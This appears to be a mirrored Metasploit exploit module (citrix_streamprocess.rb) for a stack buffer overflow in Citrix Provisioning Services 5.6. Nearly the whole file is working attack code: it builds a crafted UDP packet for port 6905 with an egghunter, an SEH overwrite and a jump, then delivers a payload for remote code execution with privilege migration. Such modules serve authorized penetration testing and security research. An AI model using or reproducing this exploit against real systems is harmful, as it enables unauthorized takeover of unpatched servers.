Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/citrix_streamprocess.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Udp

10
  include Msf::Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.

19
          By sending a specially crafted packet to the Provisioning Services server, a fixed

20
          length buffer on the stack can be overflowed and arbitrary code can be executed.

21
        },

22
        'Author' => 'mog',

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'OSVDB', '70597'],

26
          [ 'ZDI', '11-023' ],

27
          [ 'URL', 'http://web.archive.org/web/20110123164820/http://secunia.com:80/advisories/42954/' ],

28
          [ 'URL', 'http://support.citrix.com/article/CTX127149' ],

29
        ],

30
        'DefaultOptions' => {

31
          # best at delaying/preventing target crashing post-exploit

32
          'EXITFUNC' => 'process',

33
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

34
        },

35
        'Payload' => {

36
          'BadChars' => "\x00", # Only "\x00\x00" breaks the overflow, but this is safer

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          # pop/pop/ret in streamprocess.exe

41
          # Service runs and automatically shuts down in Win 7

42
          [ 'Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista', { 'Ret' => 0x00423d32 } ],

43
        ],

44
        'Privileged' => true,

45
        'DefaultTarget' => 0,

46
        'DisclosureDate' => '2011-01-20',

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options([Opt::RPORT(6905)])

56
  end

57


58
  def exploit

59
    eggoptions =

60
      {

61
        :checksum => true,

62
        :eggtag => 'W00t',

63
      }

64
    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

65


66
    sploit = "\x10\x00\x02\x40"  # message type

67
    sploit << rand_text_alpha_upper(30)

68
    sploit << "\x00\x01\x00\x00" # length field

69
    sploit << rand_text_alpha_upper(400)

70
    sploit << hunter

71
    sploit << rand_text_alpha_upper(64 - hunter.length)

72


73
    sploit << "\xEB\xBE"                # Jump back 66 bytes to hunter because there's

74
    sploit << rand_text_alpha_upper(2)  # only 24 bytes of cyclic copy after ret

75
    sploit << [target.ret].pack('V')    # SE handler

76


77
    sploit << rand_text_alpha_upper(50) # Need >= 24 bytes to keep the tag out of the stack

78
    sploit << egg                       # Payload has a whole page to itself

79


80
    print_status("Trying target #{target.name}...")

81


82
    connect_udp

83
    udp_sock.put(sploit)

84
    print_status("Exploit sent, wait for egghunter.")

85
    select(nil, nil, nil, 4) # takes about 8 seconds in tests

86


87
    handler(udp_sock)

88
    disconnect_udp

89
  end

90
end

91


92